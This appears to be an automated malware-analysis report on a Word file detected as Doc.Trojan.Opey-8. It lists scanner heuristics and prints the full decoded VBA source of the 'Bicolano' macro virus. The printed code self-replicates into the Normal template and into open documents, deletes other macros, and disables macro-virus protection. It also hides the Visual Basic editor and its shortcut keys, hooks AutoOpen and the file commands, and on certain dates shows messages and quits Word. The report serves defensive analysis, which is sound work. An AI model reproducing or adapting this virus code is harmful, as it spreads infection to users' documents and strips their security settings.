Verdict: MALICIOUS
Risk Score: 248

Malware Insights

MITRE ATT&CK: T1059.005 Visual Basic
The file exhibits characteristics of a legacy WordBasic macro virus and contains VBA macros, including an AutoOpen macro, which are commonly used to initiate malicious actions upon opening the document. ClamAV detection confirms this as Doc.Trojan.Opey-8, a known malware family. The macro code is truncated, preventing a detailed analysis of its specific actions, but its presence strongly suggests an attempt to execute malicious code.
Heuristics (5)

- ClamAV: Doc.Trojan.Opey-8 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Opey-8.
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code.
- VBA macro-virus self-replication / AV tampering (critical, OLE_VBA_MACRO_VIRUS_REPLICATION): VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature. Matched line in script: `Tempo.CodeModule.DeleteLines 1, Tempo.CodeModule.CountOfLines`
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Sub AutoOpen()`
- Legacy WordBasic macro-virus markers (high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS): OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | Detection |
|---|---|---|---|---|
| macros.bas (SHA-256: 220e04490ca0163f5545b1f4e921b67461163f57e49c0c23247b138acf6f812c) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 19131 bytes | ClamAV: Doc.Trojan.Opey-8; obfuscation or payload: unlikely |

Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Bicolano"
Dim CarrierName As String
Dim VictimName As String
Dim IDString As String
Dim Author As String
Dim NT As Object
Dim AD As Object
Dim NTInfected As Boolean
Dim ADInfected As Boolean
Dim DocCount As Integer

Private Sub MainOfBicolano()
    Initialize
    CleanMe NT
    If Not NTInfected Then CopyBicolano CarrierName, VictimName
    If DocCount > 0 Then
        CleanMe AD
        If Not ADInfected Then CopyBicolano CarrierName, VictimName
    End If
    Call Action
End Sub

Private Sub CleanMe(Dirty)
    Dim AttachedMacro
    Dim Tempo As Object
    Dim Name As String
    On Error Resume Next
    NTInfected = False
    ADInfected = False
    For Each AttachedMacro In Dirty.VBProject.VBComponents
        Name = AttachedMacro.Name
        If (Name <> IDString) And (Name <> "ThisDocument") Then
            Application.OrganizerDelete Dirty.FullName, Name, wdOrganizerObjectProjectItems
        ElseIf Name = IDString Then
            If Dirty = NT Then NTInfected = True
            If Dirty = AD Then ADInfected = True
        End If
        Set Tempo = Dirty.VBProject.VBComponents(1)
        Tempo.CodeModule.DeleteLines 1, Tempo.CodeModule.CountOfLines
    Next AttachedMacro
End Sub

Private Sub CopyBicolano(Src, Dst)
    Application.OrganizerCopy Src, Dst, IDString, wdOrganizerObjectProjectItems
End Sub

Private Sub Initialize()
    Dim Carrier
    On Error Resume Next
    Activate
    IDString = "Bicolano"
    Author = "JACH"
    DocCount = Documents.Count
    Set NT = NormalTemplate
    If DocCount > 0 Then Set AD = ActiveDocument
    Carrier = MacroContainer
    If (Carrier = NT) And (DocCount > 0) Then
        CarrierName = NT.FullName
        VictimName = AD.FullName
    ElseIf (Carrier = AD) And (DocCount > 0) Then
        CarrierName = AD.FullName
        VictimName = NT.FullName
    End If
End Sub

Private Sub Activate()
    On Error Resume Next
    Application.UserName = "Bicolano"
    Application.UserInitials = "JACH"
    Application.UserAddress = "Naga City, Philippines"
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\MS Setup (ACME)\User Info", "DefName") = "Ma - uurag kami"
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\MS Setup (ACME)\User Info", "DefCompany") = "Bicolano"
    With Dialogs(wdDialogFileSummaryInfo)
        .Author = "Bicolano"
        .Title = "Magaling ang mga Bicolano"
        .Execute
    End With
    With Options
        .ConfirmConversions = False
        .SaveNormalPrompt = False
        .VirusProtection = False
    End With
    On Error Resume Next
    CommandBars("Visual Basic").Visible = False
    CommandBars("Visual Basic").Enabled = False
    CommandBars("Visual Basic").Protection = msoBarNoChangeVisible
    CommandBars("Visual Basic").Protection = msoBarNoCustomize
    CustomizationContext = NormalTemplate
    FindKey(KeyCode:=BuildKeyCode(wdKeyF11, wdKeyAlt)).Disable
    FindKey(KeyCode:=BuildKeyCode(wdKeyF8, wdKeyAlt)).Disable
End Sub

Sub FileSave()
    On Error Resume Next
    MainOfBicolano
    ActiveDocument.Save
End Sub

Sub FileClose()
    On Error Resume Next
    MainOfBicolano
    If ActiveDocument.Saved = False Then ActiveDocument.Save
    ActiveDocument.Close
End Sub

Sub FileExit()
    On Error Resume Next
    MainOfBicolano
    If ActiveDocument.Saved = False Then ActiveDocument.Save
    Application.Quit
End Sub

Sub FileNew()
    On Error Resume Next
    Dialogs(wdDialogFileNew).Show
    newfile$ = 1
    MainOfBicolano
End Sub

Sub AutoOpen()
    On Error Resume Next
    MainOfBicolano
End Sub

Sub AutoExec()
    On Error Resume Next
    MainOfBicolano
End Sub

Sub FileSaveAs()
    On Error Resume Next
    MainOfBicolano
    Dialogs(wdDialogFileSaveAs).Show
End Sub

Sub FilePageSetup()
    On Error Resume Next
    MainOfBicolano
    Dialogs(wdDialogFilePageSetup).Show
End Sub

Sub FilePrint()
    On Error Resume Next
    MainOfBicolano
    Dialogs(wdDialogFilePrint).Show
End Sub

Sub FileOpen()
    On Error Resume Next
    Dialogs(wdDialogFileOpen).Show
    MainOfBicolano
End Sub

Sub ViewVBCode()
    MainOfBicolano
End Sub

Sub ToolsMacro()
    MainOfBicolano
End Sub

Private Sub Action()
    If (WeekDay(Date) = vbWednesday) And (Month(Date) > 11) Then
        If Minute(Time) > 50 Then
            Beep
            MsgBox "I love UPLB and FOREHA!", vbInformation, "Mauurag ang mga Bicolano"
            Beep
            MsgBox "See more of me soon!!! Bye!!", vbCritical, "Bicolano"
            Application.Quit wdDoNotSaveChanges
        End If
    End If
End Sub
```